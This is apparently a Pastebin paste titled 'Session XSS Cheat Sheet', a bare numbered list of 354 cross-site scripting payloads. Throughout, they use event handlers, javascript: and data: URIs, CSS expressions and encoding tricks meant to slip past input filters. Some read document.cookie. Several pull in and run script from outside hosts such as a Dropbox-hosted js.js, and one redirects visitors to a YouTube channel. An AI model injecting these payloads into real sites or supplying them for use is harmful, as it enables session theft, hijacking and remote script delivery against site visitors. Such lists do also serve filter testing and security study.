Mukezh

Session XSS Cheat Sheet

Feb 7th, 2019
60
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 102.54 KB | None | 0 0
  1. %253Cscript%253Ealert('XSS')%253C%252Fscript%253E
  2. <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
  3. <IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
  4. <IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
  5. <IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
  6. <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
  7. <IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
  8. <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
  9. <IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
  10. <IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
  11. <IMG SRC=x onoffline="alert(String.fromCharCode(88,83,83))">
  12. <IMG SRC=x onpagehide="alert(String.fromCharCode(88,83,83))">
  13. <IMG SRC=x onpageshow="alert(String.fromCharCode(88,83,83))">
  14. <IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83))">
  15. <IMG SRC=x onresize="alert(String.fromCharCode(88,83,83))">
  16. <IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))">
  17. <IMG SRC=x onunload="alert(String.fromCharCode(88,83,83))">
  18. <IMG SRC=x onblur="alert(String.fromCharCode(88,83,83))">
  19. <IMG SRC=x onchange="alert(String.fromCharCode(88,83,83))">
  20. <IMG SRC=x oncontextmenu="alert(String.fromCharCode(88,83,83))">
  21. <IMG SRC=x oninput="alert(String.fromCharCode(88,83,83))">
  22. <IMG SRC=x oninvalid="alert(String.fromCharCode(88,83,83))">
  23. <IMG SRC=x onreset="alert(String.fromCharCode(88,83,83))">
  24. <IMG SRC=x onsearch="alert(String.fromCharCode(88,83,83))">
  25. <IMG SRC=x onselect="alert(String.fromCharCode(88,83,83))">
  26. <IMG SRC=x onsubmit="alert(String.fromCharCode(88,83,83))">
  27. <IMG SRC=x onkeydown="alert(String.fromCharCode(88,83,83))">
  28. <IMG SRC=x onkeypress="alert(String.fromCharCode(88,83,83))">
  29. <IMG SRC=x onkeyup="alert(String.fromCharCode(88,83,83))">
  30. <IMG SRC=x onclick="alert(String.fromCharCode(88,83,83))">
  31. <IMG SRC=x ondblclick="alert(String.fromCharCode(88,83,83))">
  32. <IMG SRC=x onmousedown="alert(String.fromCharCode(88,83,83))">
  33. <IMG SRC=x onmousemove="alert(String.fromCharCode(88,83,83))">
  34. <IMG SRC=x onmouseout="alert(String.fromCharCode(88,83,83))">
  35. <IMG SRC=x onmouseover="alert(String.fromCharCode(88,83,83))">
  36. <IMG SRC=x onmouseup="alert(String.fromCharCode(88,83,83))">
  37. <IMG SRC=x onmousewheel="alert(String.fromCharCode(88,83,83))">
  38. <IMG SRC=x onwheel="alert(String.fromCharCode(88,83,83))">
  39. <IMG SRC=x ondrag="alert(String.fromCharCode(88,83,83))">
  40. <IMG SRC=x ondragend="alert(String.fromCharCode(88,83,83))">
  41. <IMG SRC=x ondragenter="alert(String.fromCharCode(88,83,83))">
  42. <IMG SRC=x ondragleave="alert(String.fromCharCode(88,83,83))">
  43. <IMG SRC=x ondragover="alert(String.fromCharCode(88,83,83))">
  44. <IMG SRC=x ondragstart="alert(String.fromCharCode(88,83,83))">
  45. <IMG SRC=x ondrop="alert(String.fromCharCode(88,83,83))">
  46. <IMG SRC=x onscroll="alert(String.fromCharCode(88,83,83))">
  47. <IMG SRC=x oncopy="alert(String.fromCharCode(88,83,83))">
  48. <IMG SRC=x oncut="alert(String.fromCharCode(88,83,83))">
  49. <IMG SRC=x onpaste="alert(String.fromCharCode(88,83,83))">
  50. <IMG SRC=x onabort="alert(String.fromCharCode(88,83,83))">
  51. <IMG SRC=x oncanplay="alert(String.fromCharCode(88,83,83))">
  52. <IMG SRC=x oncanplaythrough="alert(String.fromCharCode(88,83,83))">
  53. <IMG SRC=x oncuechange="alert(String.fromCharCode(88,83,83))">
  54. <IMG SRC=x ondurationchange="alert(String.fromCharCode(88,83,83))">
  55. <IMG SRC=x onemptied="alert(String.fromCharCode(88,83,83))">
  56. <IMG SRC=x onended="alert(String.fromCharCode(88,83,83))">
  57. <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
  58. <IMG SRC=x onloadeddata="alert(String.fromCharCode(88,83,83))">
  59. <IMG SRC=x onloadedmetadata="alert(String.fromCharCode(88,83,83))">
  60. <IMG SRC=x onloadstart="alert(String.fromCharCode(88,83,83))">
  61. <IMG SRC=x onpause="alert(String.fromCharCode(88,83,83))">
  62. <IMG SRC=x onplay="alert(String.fromCharCode(88,83,83))">
  63. <IMG SRC=x onplaying="alert(String.fromCharCode(88,83,83))">
  64. <IMG SRC=x onprogress="alert(String.fromCharCode(88,83,83))">
  65. <IMG SRC=x onratechange="alert(String.fromCharCode(88,83,83))">
  66. <IMG SRC=x onseeked="alert(String.fromCharCode(88,83,83))">
  67. <IMG SRC=x onseeking="alert(String.fromCharCode(88,83,83))">
  68. <IMG SRC=x onstalled="alert(String.fromCharCode(88,83,83))">
  69. <IMG SRC=x onsuspend="alert(String.fromCharCode(88,83,83))">
  70. <IMG SRC=x ontimeupdate="alert(String.fromCharCode(88,83,83))">
  71. <IMG SRC=x onvolumechange="alert(String.fromCharCode(88,83,83))">
  72. <IMG SRC=x onwaiting="alert(String.fromCharCode(88,83,83))">
  73. <IMG SRC=x onshow="alert(String.fromCharCode(88,83,83))">
  74. <IMG SRC=x ontoggle="alert(String.fromCharCode(88,83,83))">
  75. <META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)";
  76. <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
  77. <INPUT TYPE="BUTTON" action="alert('XSS')"/>
  78. "><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1>
  79. "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>
  80. <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
  81. <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
  82. "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>
  83. "></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder="0%EF%BB%BF
  84. "><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(document.cookie)"></IFRAME>123</h1>
  85. "><h1><iframe width="420" height="315" src="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" allowfullscreen></iframe>123</h1>
  86. ><h1><IFRAME width="420" height="315" frameborder="0" onmouseover="document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr
  87. g'"></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250
  88. <IFRAME width="420" height="315" frameborder="0" onload="alert(document.cookie)"></IFRAME>
  89. "><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1>
  90. "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>
  91. <iframe src=http://xss.rocks/scriptlet.html <
  92. <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
  93. <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
  94. <iframe src="&Tab;javascript:prompt(1)&Tab;">
  95. <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
  96. <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
  97. <sVg><scRipt >alert&lpar;1&rpar; {Opera}
  98. <img/src=`` onerror=this.onerror=confirm(1)
  99. <form><isindex formaction="javascript&colon;confirm(1)"
  100. <img src=``&NewLine; onerror=alert(1)&NewLine;
  101. <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
  102. <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
  103. <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
  104. <script /**/>/**/alert(1)/**/</script /**/
  105. &#34;&#62;<h1/onmouseover='\u0061lert(1)'>
  106. <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
  107. <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
  108. <svg><script xlink:href=data&colon;,window.open('https://www.google.com/') </script
  109. <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
  110. <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
  111. <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
  112. <form><a href="javascript:\u0061lert&#x28;1&#x29;">X</script><img/*/src="worksinchrome&colon;prompt&#x28;1&#x29;"/*/onerror='eval(src)'>
  113. <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
  114. <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
  115. <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a
  116. http://www.google<script .com>alert(document.location)</script
  117. <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
  118. <img/src=@&#32;&#13; onerror = prompt('&#49;')
  119. <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
  120. <script ^__^>alert(String.fromCharCode(49))</script ^__^
  121. </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(
  122. &#00;</form><input type&#61;"date" onfocus="alert(1)">
  123. <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>
  124. <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
  125. <iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>
  126. <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
  127. <script ~~~>alert(0%0)</script ~~~>
  128. <style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
  129. <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
  130. <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
  131. &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
  132. &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
  133. <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
  134. <div/style="width:expression(confirm(1))">X</div> {IE7}
  135. <iframe// src=javaSCRIPT&colon;alert(1)
  136. //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
  137. /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
  138. //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
  139. </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
  140. <a/href="javascript:&#13; javascript:prompt(1)"><input type="X">
  141. </plaintext\></|\><plaintext/onmouseover=prompt(1)
  142. </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}
  143. <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
  144. <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
  145. <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
  146. <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
  147. <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
  148. <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
  149. <var onmouseover="prompt(1)">On Mouse Over</var>
  150. <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
  151. <img src="/" =_=" title="onerror='prompt(1)'">
  152. <%<!--'%><script>alert(1);</script -->
  153. <script src="data:text/javascript,alert(1)"></script>
  154. <iframe/src \/\/onload = prompt(1)
  155. <iframe/onreadystatechange=alert(1)
  156. <svg/onload=alert(1)
  157. <input value=<><iframe/src=javascript:confirm(1)
  158. <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
  159. http://www.<script>alert(1)</script .com
  160. <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
  161. <svg><script ?>alert(1)
  162. <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
  163. <img src=`xx:xx`onerror=alert(1)>
  164. <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
  165. <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
  166. <math><a xlink:href="//jsfiddle.net/t846h/">click
  167. <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
  168. <svg contentScriptType=text/vbs><script>MsgBox+1
  169. <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
  170. <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
  171. <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
  172. <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
  173. <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
  174. <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
  175. <script>+-+-1-+-+alert(1)</script>
  176. <body/onload=&lt;!--&gt;&#10alert(1)>
  177. <script itworksinallbrowsers>/*<script* */alert(1)</script
  178. <img src ?itworksonchrome?\/onerror = alert(1)
  179. <svg><script>//&NewLine;confirm(1);</script </svg>
  180. <svg><script onlypossibleinopera:-)> alert(1)
  181. <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
  182. <script x> alert(1) </script 1=2
  183. <div/onmouseover='alert(1)'> style="x:">
  184. <--`<img/src=` onerror=alert(1)> --!>
  185. <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
  186. <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
  187. "><img src=x onerror=window.open('https://www.google.com/');>
  188. <form><button formaction=javascript&colon;alert(1)>CLICKME
  189. <math><a xlink:href="//jsfiddle.net/t846h/">click
  190. <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
  191. <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
  192. <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
  193. <script\x20type="text/javascript">javascript:alert(1);</script>
  194. <script\x3Etype="text/javascript">javascript:alert(1);</script>
  195. <script\x0Dtype="text/javascript">javascript:alert(1);</script>
  196. <script\x09type="text/javascript">javascript:alert(1);</script>
  197. <script\x0Ctype="text/javascript">javascript:alert(1);</script>
  198. <script\x2Ftype="text/javascript">javascript:alert(1);</script>
  199. <script\x0Atype="text/javascript">javascript:alert(1);</script>
  200. '`"><\x3Cscript>javascript:alert(1)</script>
  201. '`"><\x00script>javascript:alert(1)</script>
  202. <img src=1 href=1 onerror="javascript:alert(1)"></img>
  203. <audio src=1 href=1 onerror="javascript:alert(1)"></audio>
  204. <video src=1 href=1 onerror="javascript:alert(1)"></video>
  205. <body src=1 href=1 onerror="javascript:alert(1)"></body>
  206. <image src=1 href=1 onerror="javascript:alert(1)"></image>
  207. <object src=1 href=1 onerror="javascript:alert(1)"></object>
  208. <script src=1 href=1 onerror="javascript:alert(1)"></script>
  209. <svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize>
  210. <title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange>
  211. <iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad>
  212. <body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter>
  213. <body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus>
  214. <frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll>
  215. <script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange>
  216. <html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp>
  217. <body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange>
  218. <svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad>
  219. <body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide>
  220. <body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver>
  221. <body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload>
  222. <body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad>
  223. <bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange>
  224. <html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave>
  225. <html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel>
  226. <style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad>
  227. <iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange>
  228. <body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow>
  229. <style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange>
  230. <frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus>
  231. <applet onError applet onError="javascript:javascript:alert(1)"></applet onError>
  232. <marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart>
  233. <script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad>
  234. <html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver>
  235. <html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter>
  236. <body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload>
  237. <html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown>
  238. <marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll>
  239. <xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange>
  240. <frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur>
  241. <applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange>
  242. <svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload>
  243. <html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut>
  244. <body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove>
  245. <body onResize body onResize="javascript:javascript:alert(1)"></body onResize>
  246. <object onError object onError="javascript:javascript:alert(1)"></object onError>
  247. <body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState>
  248. <html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove>
  249. <applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange>
  250. <body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide>
  251. <svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload>
  252. <applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror>
  253. <body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup>
  254. <body onunload body onunload="javascript:javascript:alert(1)"></body onunload>
  255. <iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload>
  256. <body onload body onload="javascript:javascript:alert(1)"></body onload>
  257. <html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover>
  258. <object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload>
  259. <body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload>
  260. <body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus>
  261. <body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown>
  262. <iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload>
  263. <iframe src iframe src="javascript:javascript:alert(1)"></iframe src>
  264. <svg onload svg onload="javascript:javascript:alert(1)"></svg onload>
  265. <html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove>
  266. <body onblur body onblur="javascript:javascript:alert(1)"></body onblur>
  267. \x3Cscript>javascript:alert(1)</script>
  268. '"`><script>/* *\x2Fjavascript:alert(1)// */</script>
  269. <script>javascript:alert(1)</script\x0D
  270. <script>javascript:alert(1)</script\x0A
  271. <script>javascript:alert(1)</script\x0B
  272. <script charset="\x22>javascript:alert(1)</script>
  273. <!--\x3E<img src=xxx:x onerror=javascript:alert(1)> -->
  274. --><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> -->
  275. --><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> -->
  276. --><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> -->
  277. --><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> -->
  278. `"'><img src='#\x27 onerror=javascript:alert(1)>
  279. <a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a>
  280. "'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p>
  281. <a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a>
  282. <a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a>
  283. <a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a>
  284. <a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a>
  285. <a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a>
  286. <a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a>
  287. <a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a>
  288. <a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a>
  289. <a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a>
  290. <a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a>
  291. <a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a>
  292. <a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a>
  293. <a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a>
  294. <a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a>
  295. <script>/* *\x2A/javascript:alert(1)// */</script>
  296. <script>/* *\x00/javascript:alert(1)// */</script>
  297. <style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style>
  298. <style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style>
  299. <style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style>
  300. <style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style>
  301. <style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style>
  302. "'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF
  303. "'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF
  304. <script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script>
  305. <script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script>
  306. <script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script>
  307. '`"><\x3Cscript>javascript:alert(1)</script>
  308. '`"><\x00script>javascript:alert(1)</script>
  309. "'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
  310. "'`><\x00img src=xxx:x onerror=javascript:alert(1)>
  311. <script src="data:text/plain\x2Cjavascript:alert(1)"></script>
  312. <script src="data:\xD4\x8F,javascript:alert(1)"></script>
  313. <script src="data:\xE0\xA4\x98,javascript:alert(1)"></script>
  314. <script src="data:\xCB\x8F,javascript:alert(1)"></script>
  315. <script\x20type="text/javascript">javascript:alert(1);</script>
  316. <script\x3Etype="text/javascript">javascript:alert(1);</script>
  317. <script\x0Dtype="text/javascript">javascript:alert(1);</script>
  318. <script\x09type="text/javascript">javascript:alert(1);</script>
  319. <script\x0Ctype="text/javascript">javascript:alert(1);</script>
  320. <script\x2Ftype="text/javascript">javascript:alert(1);</script>
  321. <script\x0Atype="text/javascript">javascript:alert(1);</script>
  322. ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF
  323. ABC<div style="x:expression\x5C(javascript:alert(1)">DEF
  324. ABC<div style="x:expression\x00(javascript:alert(1)">DEF
  325. ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF
  326. ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF
  327. ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF
  328. ABC<div style="x:\x09expression(javascript:alert(1)">DEF
  329. ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF
  330. ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF
  331. ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF
  332. ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF
  333. ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF
  334. ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF
  335. ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF
  336. ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF
  337. ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF
  338. ABC<div style="x:\x20expression(javascript:alert(1)">DEF
  339. ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF
  340. ABC<div style="x:\x00expression(javascript:alert(1)">DEF
  341. ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF
  342. ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF
  343. ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF
  344. ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF
  345. ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF
  346. ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF
  347. ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF
  348. ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF
  349. <a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  350. <a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  351. <a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  352. <a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  353. <a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  354. <a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a>
